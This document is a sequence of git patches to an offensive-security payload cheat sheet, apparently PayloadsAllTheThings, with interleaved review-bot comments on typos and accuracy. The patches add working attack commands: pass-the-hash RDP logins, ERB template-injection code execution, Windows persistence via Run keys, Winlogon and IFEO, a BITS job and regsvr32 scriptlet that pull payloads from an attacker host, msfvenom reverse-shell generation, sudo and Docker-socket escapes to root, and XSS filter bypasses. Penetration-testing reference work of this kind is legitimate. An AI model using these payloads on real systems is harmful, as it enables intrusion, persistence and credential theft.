-xfreerd /u:runner /v:10.0.0.1 # password will be asked +root@payload$ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+ +root@payload$ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group. +root@payload$ xfreerd /u:runner /v:10.0.0.1 # password will be asked ``` ## Netuse @@ -210,19 +252,18 @@ xfreerd /u:runner /v:10.0.0.1 # password will be asked Windows only ```powershell -net use \\ordws01.cscou.lab /user:DOMAIN\username password -C$ +PS C:\> net use \\ordws01.cscou.lab /user:DOMAIN\username password C$ ``` ## Runas ```powershell -runas /netonly /user:DOMAIN\username "cmd.exe" -runas /noprofil /netonly /user:DOMAIN\username cmd.exe +PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe" +PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe ``` ## References - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) -- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html) +- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html) \ No newline at end of file From 7670e2c36cd68663318aa2a7fd069e680f97097f Mon Sep 17 00:00:00 2001 From: meizjm3i Date: Fri, 29 May 2020 12:28:55 +0800 Subject: [PATCH 65/85] Update ERB SSTI tips --- Server Side Template Injection/README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 687a319..7c9956c 100644 
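Review bot: in the CVE-2019-14287 hunk of `Linux - Privilege Escalation.md`, `when a user have the following permissions` should be `has`, and the block should say which sudo versions are affected so a reader can tell whether a host is patched; the fence is also tagged `powershell` for a `sudo -l` / bash snippet.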
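Review bot: the `driverquery.exe /fo table` sample in the `EoP - Evaluating Vulnerable Drivers` hunk shows link dates such as `12/9/1975`, `3/1/2087` and `1/24/2081` for Microsoft in-box drivers, so the `Link Date` column is not a usable signal of driver age, yet the section gives no other criterion. Say what to compare instead (vendor, file version and path from `driverquery /v`) rather than leaving the table as the only guidance. Minor: a blank line is missing after the heading and there is a trailing empty line inside the fence.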
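Review bot: `git clone https://github.com/byt3bl33d3r/CrackMapExec.github` in the Crackmapexec hunk of `Windows - Using credentials.md` carries a `.github` suffix that is not part of the repository name (it was in the removed line too); it should be `CrackMapExec` or `CrackMapExec.git`.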
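Review bot: in the WinRM hunk, `Require:` should be `Requires:`, and the ruby sample sends the literal `exit` line to the remote shell via `shell.run` before the `until command == "exit\n"` check ends the loop, so the remote PowerShell receives an `exit` it does not need; test the command before running it. `http://ip:5985/wsman` is a placeholder and should be labelled as one.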
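Review bot: the `wmic ... process call create "C:\Windows\System32\calc.exe”` line closes its argument with a typographic `”` instead of `"`, so it will not parse when copied; the character was in the removed line as well, but this hunk rewrites the line and is the place to fix it.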
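Review bot: the descriptions above `atexec.py` and `dcomexec.py` in the Impacket hunk are swapped: `atexec.py` is the one that executes a command through the Task Scheduler service, and `dcomexec.py` is the semi-interactive shell using different DCOM endpoints. Swap the two comments.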
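Review bot: `root@payload$ run getgui -u admin -p 1234` under `or with Metasploit` is a Meterpreter script, not a host shell command; the new prompt should be `meterpreter >` so readers do not try it from a terminal.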
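Review bot: `root@payload$ xfreerd /u:runner /v:10.0.0.1` keeps the `xfreerd` typo (missing `p`) from the removed line; fix it while re-prefixing. The block also mixes the old `-u test -p HASH host` option syntax with the `/u: /pth: /v:` form in the other two lines, which is worth a comment.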
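Review bot: the rewritten Netuse line `net use \\ordws01.cscou.lab /user:DOMAIN\username password C$` places the share after the password, which is not valid `net use` syntax; the share belongs in the UNC path: `net use \\ordws01.cscou.lab\C$ /user:DOMAIN\username password`.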
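Review bot: `/noprofil` in the Runas hunk should be `/noprofile`; the typo was already in the removed line and survives the prompt change.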
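Review bot: the References hunk of `Windows - Using credentials.md` changes nothing but removes the trailing newline (`\ No newline at end of file`); restore it.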
--- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -95,7 +95,13 @@ Execute code using SSTI for ERB engine. ```ruby <%= system('cat /etc/passwd') %> +<%= `ls /` %> +<%= IO.popen('ls /').readlines() %> +<% require 'open3’ %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> +<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> ``` + + Execute code using SSTI for Slim engine. ```powershell From a987b8be9faa800085c73d4b843c6b1405cd045a Mon Sep 17 00:00:00 2001 From: meizjm3i Date: Fri, 29 May 2020 18:35:22 +0800 Subject: [PATCH 66/85] corrected a single quotation mark closure error --- Server Side Template Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 7c9956c..eb78c9d 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -97,7 +97,7 @@ Execute code using SSTI for ERB engine. <%= system('cat /etc/passwd') %> <%= `ls /` %> <%= IO.popen('ls /').readlines() %> -<% require 'open3’ %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> +<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> ``` From 71ddb449cec40952d5f0f9450de0583d8b149636 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 1 Jun 2020 21:37:32 +0200 Subject: [PATCH 67/85] Windows Persistence --- API Key Leaks/README.md | 11 ++- .../Linux - Privilege Escalation.md | 1 + .../Windows - Persistence.md | 79 ++++++++++++++++++- Server Side Request Forgery/README.md | 8 ++ 4 files changed, 94 insertions(+), 5 deletions(-) diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index 8be1b6f..b3768b0 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md 
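Review bot: `<% require 'open3’ %>` in the ERB hunk closes the string with a typographic `’`, so the template will not parse (the next commit corrects it); the hunk also inserts two blank lines before `Execute code using SSTI for Slim engine.` where the file otherwise uses one.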
@@ -16,6 +16,7 @@ - [Twitter API Secret](#twitter-api-secret) - [Twitter Bearer Token](#twitter-bearer-token) - [Gitlab Personal Access Token](#gitlab-personal-access-token) + - [HockeyApp API Token](#hockeyapp-api-token) - [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key) @@ -98,6 +99,13 @@ curl "https://gitlab.example.com/api/v4/projects?private_token= By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token @@ -125,4 +133,5 @@ $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt * [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d) * [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060) -* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/) \ No newline at end of file +* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/) +* [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index acc6b89..5dad4e3 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -470,6 +470,7 @@ Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/maste # If you have a full TTY, you can exploit it like this sudo -u#-1 /bin/bash +sudo -u#4294967295 id ``` ## GTFOBins 
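Review bot: the added `sudo -u#4294967295 id` in the sudo_inject hunk deserves a comment saying why it is listed: 4294967295 is 2^32-1, i.e. `-1` reinterpreted as an unsigned 32-bit user id, so it is the same bypass as the `sudo -u#-1 /bin/bash` line directly above it, not a second technique. Without that, a reader may take the two lines for independent issues.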
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 963d807..c1fc028 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -6,14 +6,17 @@ * [Disable Windows Defender](#disable-windows-defender) * [Disable Windows Firewall](#disable-windows-firewall) * [Userland](#userland) - * [Registry](#registry) + * [Registry HKCU](#registry-hkcu) * [Startup](#startup) * [Scheduled Task](#scheduled-task) + * [BITS Jobs](#bits-jobs) * [Serviceland](#serviceland) * [IIS](#iis) * [Windows Service](#windows-service) * [Elevated](#elevated) - * [HKLM](#hklm) + * [Registry HKLM](#registry-hklm) + * [Winlogon Helper DLL](#) + * [GlobalFlag](#) * [Services](#services) * [Scheduled Task](#scheduled-task) * [Binary Replacement](#binary-replacement) @@ -65,6 +68,15 @@ Value name: Backdoor Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe ``` +Using the command line + +```powershell +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +``` + Using SharPersist ```powershell 
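Review bot: the two new ToC entries `* [Winlogon Helper DLL](#)` and `* [GlobalFlag](#)` have empty anchors, so they jump to the top of the page; use `#winlogon-helper-dll` and `#globalflag`, matching the pattern of every other entry in the same list.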
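Review bot: in the HKCU command-line hunk, the `RunServices` and `RunServicesOnce` keys are Windows 9x/Me autostart locations; NT-based Windows does not process them, so the third and fourth `reg add` lines create inert values (and a noisy artifact) rather than persistence. Either drop them or mark them as legacy. For `Run` and `RunOnce`, one line pointing out that new values under these keys are exactly what registry-monitoring rules (Sysmon Event ID 13) alert on would make the section useful to defenders as well.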
@@ -110,6 +122,23 @@ SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly ``` + +### BITS Jobs + +```powershell +bitsadmin /create backdoor +bitsadmin /addfile backdoor "http://10.10.10.10/evil.exe" "C:\tmp\evil.exe" + +# v1 +bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL +bitsadmin /SetMinRetryDelay "backdoor" 60 +bitsadmin /resume backdoor + +# v2 - exploit/multi/script/web_delivery +bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll" +bitsadmin /resume backdoor +``` + ## Serviceland ### IIS @@ -132,7 +161,7 @@ SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som ## Elevated -### HKLM +### Registry HKLM Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows. 
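Review bot: the BITS hunk starts with two `+` blank lines before `### BITS Jobs`, leaving a double blank line after the SharPersist block; one is enough. In the v1 commands, `bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL` passes `NUL` as the parameter string, whereas Microsoft's documented example uses `NULL` to mean "no parameters"; please verify which spelling bitsadmin actually treats as empty before readers rely on it. A note that `bitsadmin /list /allusers /verbose` enumerates jobs like this one would give the section a detection angle to match its persistence angle.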
@@ -141,6 +170,41 @@ Value name: Backdoor Value data: C:\Windows\Temp\backdoor.exe ``` +Using the command line + +```powershell +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +``` + +#### Winlogon Helper DLL + +> Run executable during Windows logon + +```powershell +msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evilbinary.exe +msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evilbinary.dll + +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, evilbinary.exe" /f +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, evilbinary.exe" /f +Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, evilbinary.exe" -Force +Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force +``` + + +#### GlobalFlag + +> Run executable after notepad is killed + +```powershell +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe" +``` + + ### Services Create a service that will start automatically or on-demand. 
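Review bot: in the Winlogon hunk the heading says "Helper DLL" but every command points `Userinit` and `Shell` at an executable; the `evilbinary.dll` produced by the second msfvenom line is never used afterwards, so either drop that line or add the DLL-based variant the heading promises. The heading level is also off: `#### Winlogon Helper DLL` and `#### GlobalFlag` nest under `### Registry HKLM`, while the ToC hunk in this same patch lists them as siblings of it.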
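Review bot: in the GlobalFlag hunk, `512` is a magic number the reader has to look up: it is 0x200, `FLG_MONITOR_SILENT_PROCESS_EXIT`, and a comment saying so (plus that `MonitorProcess` is the program launched when notepad.exe exits) would explain why three keys are needed. Writes under `Image File Execution Options` and `SilentProcessExit` are a well-known persistence indicator (MITRE ATT&CK T1546.012), which is worth stating so the section reads as something to detect as well as to demonstrate.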
@@ -176,6 +240,8 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D | Display Switcher | C:\Windows\System32\DisplaySwitch.exe | | App Switcher | C:\Windows\System32\AtBroker.exe | +In Metasploit : `use post/windows/manage/sticky_keys` + #### Binary Replacement on Windows 10+ Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** executable. @@ -217,4 +283,9 @@ Enter-PSSession -ComputerName -Credential \Administr * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) * [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) * [IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/) -* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html) \ No newline at end of file +* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html) +* [Persistence - Checklist - @netbiosX](https://github.com/netbiosX/Checklists/blob/master/Persistence.md) +* [Persistence – Winlogon Helper DLL - @netbiosX](https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/) +* [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/) +* [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) +* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/) \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 964f300..84bfa50 100644 
--- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -407,6 +407,14 @@ gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20- gopher://127.0.0.1:6379/_save ``` +## SSRF exploiting PDF file + +Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c&feature=emb_title) + +```powershell + +``` + ## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) From bd0c6847b80d72dd9eb47f79be607b9176349ff1 Mon Sep 17 00:00:00 2001 From: Didier Arenzana Date: Thu, 4 Jun 2020 17:26:45 +0200 Subject: [PATCH 68/85] clarification in 'bypass character filter' added the results of echo and tr commands for clarification --- Command Injection/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Command Injection/README.md b/Command Injection/README.md index ba3850f..5421c54 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -145,12 +145,17 @@ Commands execution without backslash and slash - linux bash ```powershell swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1} +/ swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd root:x:0:0:root:/root:/bin/bash swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1' +/ + swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< . +/ + swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd root:x:0:0:root:/root:/bin/bash ``` From 03a0bda20d1da27f9038b5e7bdef048350d3bdce Mon Sep 17 00:00:00 2001 From: "reza.duty" Date: Tue, 9 Jun 2020 20:05:32 +0430 Subject: [PATCH 69/85] Update README.md --- XSS Injection/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 7b28ee9..2939b24 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -1062,6 +1062,11 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
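Review bot: the "SSRF exploiting PDF file" hunk adds an empty `powershell` fence under the WeasyPrint link; either put the example there or keep the section as the link alone, since an empty code block reads as missing content.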
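Review bot: the `+/` output lines in the command-injection hunk are correct, but a one-line comment on the mechanism would make them self-explanatory: `tr '!-0' '"-1'` maps the 16 characters 0x21..0x30 onto 0x22..0x31, shifting each by one code point, so `.` (0x2E) becomes `/` (0x2F) without a slash ever appearing in the typed command.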
``` +### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019 + +```javascript +\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e +``` ## References From 24981f945ff62e0ee61439dfa79a013fbf55cabb Mon Sep 17 00:00:00 2001 From: bsysop Date: Sun, 14 Jun 2020 12:08:25 -0300 Subject: [PATCH 70/85] metadata.nicob.net not long resolve to metadata IP ``` $ dig +short metadata.nicob.net ... ``` Not resolving --- Server Side Request Forgery/README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 84bfa50..38318b2 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -444,7 +444,6 @@ DNS record ```powershell http://instance-data http://169.254.169.254 -http://metadata.nicob.net/ http://169.254.169.254.xip.io/ http://1ynrnhl.xip.io/ http://www.owasp.org.1ynrnhl.xip.io/ From 010b550dece2723febe8198608e46d1bf6ea9b91 Mon Sep 17 00:00:00 2001 From: "reza.duty" Date: Wed, 17 Jun 2020 11:42:26 +0430 Subject: [PATCH 71/85] Update README.md --- XSS Injection/README.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 2939b24..ecb5a4d 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -39,6 +39,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass using an alternate way to redirect](#bypass-unsing-an-alternate-way-to-redirect) - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) - [Bypass ">" using nothing](#bypass----using-nothing) + - [Bypass "<" using <](#bypass----using-<) - [Bypass ";" using another character](#bypass-using------using-another-character) - [Bypass using HTML encoding](#bypass-using-html-encoding) - [Bypass using Katana](#bypass-using-katana) 
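Review bot: the new ToC entry `[Bypass "<" using <](#bypass----using-<)` has a raw `<` in its anchor, which GitHub never emits in a heading slug, so the link will not resolve; its displayed text also reads as "bypass < using <", which suggests the entity form the title meant to show was decoded somewhere between source and render. Escape it in the source so both the ToC text and the heading survive rendering.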
@@ -776,6 +777,12 @@ You don't need to close your tags. .͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕ +``` + ### Bypass ";" using another character ```javascript @@ -1135,3 +1142,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) - [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056) +- [Bypass < with <](https://hackerone.com/reports/639684) From ecf29c2cbe6c61261e67de657cc712f8dc245c4d Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 18 Jun 2020 11:55:48 +0200 Subject: [PATCH 72/85] Active Directory - Mitigations --- .../Active Directory Attack.md | 17 +++++++- .../Container - Docker Pentest.md | 28 ++++++++++++- .../Network Pivoting Techniques.md | 39 ++++++++++++++++++- Server Side Request Forgery/README.md | 20 ++++++++++ 4 files changed, 100 insertions(+), 4 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 0e206fa..ad4ff3c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -715,6 +715,11 @@ root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi veloci Converting kirbi => ccache ``` + +Mitigations: +* Hard to detect because they are legit TGT tickets +* Mimikatz generate a golden ticket with a life-span of 10 years + ### Pass-the-Ticket Silver Tickets Forging a TGS require machine accound password (key) or NTLM hash from the KDC 
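Review bot: the body of the new "Bypass "<"" section arrives here as combining-character noise (`.͓̮̮ͅ=sW&...`), so the payload itself cannot be reviewed; please check that the committed file contains the intended entity-based payload rather than mojibake. The added hackerone reference title ("Bypass < with <") shows the same collapsed-entity problem as the ToC entry.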
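Review bot: the two bullets added under "Mitigations:" after the ticket_converter block are observations, not mitigations: "Hard to detect because they are legit TGT tickets" and "Mimikatz generate a golden ticket with a life-span of 10 years" describe the attack. Either relabel the list "Detection notes" or turn them into actions, e.g. alert on TGTs whose lifetime exceeds the domain's Kerberos policy (the 10-year default is exactly such an outlier). Also "generate" should be "generates".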
@@ -734,6 +739,9 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` +Mitigations: +* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. + ### Kerberoasting > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) @@ -772,7 +780,7 @@ Then crack the ticket with hashcat or john ``` Mitigations: -* Have a very long password for your accounts with SPNs (> 25 characters) +* Have a very long password for your accounts with SPNs (> 32 characters) * Make sure no users have SPNs ### KRB_AS_REP Roasting @@ -834,6 +842,9 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt ``` +Mitigations: +* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). + ### Pass-the-Hash The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. 
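Review bot: the silver-ticket mitigation "Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket" addresses delegation, not forged service tickets: a silver ticket is minted with the service account's key and presented straight to the service, which never consults the KDC, so that flag does not stop it. Rotating the affected machine or service account password is what invalidates the forged ticket; state that here and keep the delegation flag for the delegation sections.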
@@ -1595,6 +1606,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 ## References +* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) * [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) * [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) @@ -1660,4 +1672,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 * [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation) * [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/) * [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/) -* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) \ No newline at end of file +* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) +* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html) \ No newline at end of file diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md index 26ca5d9..55b3cb3 100644 --- a/Methodology and Resources/Container - Docker Pentest.md +++ b/Methodology and Resources/Container - Docker Pentest.md 
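Review bot: the new roguelynn reference is inserted directly above a pre-existing entry whose URL is written as `(#https://www.dsinternals.com/...)`, i.e. prefixed with `#`, so it links to a nonexistent in-page anchor rather than the article; since the list is being edited, drop the `#` in the same change.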
@@ -33,6 +33,31 @@ curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Conte curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start ``` +Exploit using [brompwnie/ed](https://github.com/brompwnie/ed) + +```powershell +root@37bb034797d1:/tmp# ./ed_linux_amd64 -path=/var/run/ -autopwn=true +[+] Hunt dem Socks +[+] Hunting Down UNIX Domain Sockets from: /var/run/ +[*] Valid Socket: /var/run/docker.sock +[+] Attempting to autopwn +[+] Hunting Docker Socks +[+] Attempting to Autopwn: /var/run/docker.sock +[*] Getting Docker client... +[*] Successfully got Docker client... +[+] Attempting to escape to host... +[+] Attempting in TTY Mode +chroot /host && clear +echo 'You are now on the underlying host' +chroot /host && clear +echo 'You are now on the underlying host' +/ # chroot /host && clear +/ # echo 'You are now on the underlying host' +You are now on the underlying host +/ # id +uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) +``` + ## Open Docker API Port 
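Review bot: the `brompwnie/ed` hunk shows the escape to the host but never states the precondition the reader needs: `-path=/var/run/` only finds a valid socket because the host's `docker.sock` was mounted into the container, as the `curl --unix-socket /var/run/docker.sock` lines just above already assume. One sentence saying so, with the corresponding hardening (do not bind-mount the daemon socket into untrusted containers, or front it with a proxy that restricts the API), would make this read as a finding rather than only a demo. The repeated `chroot /host && clear` / `echo` lines are the tool echoing its own commands and could be trimmed to keep the transcript readable.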
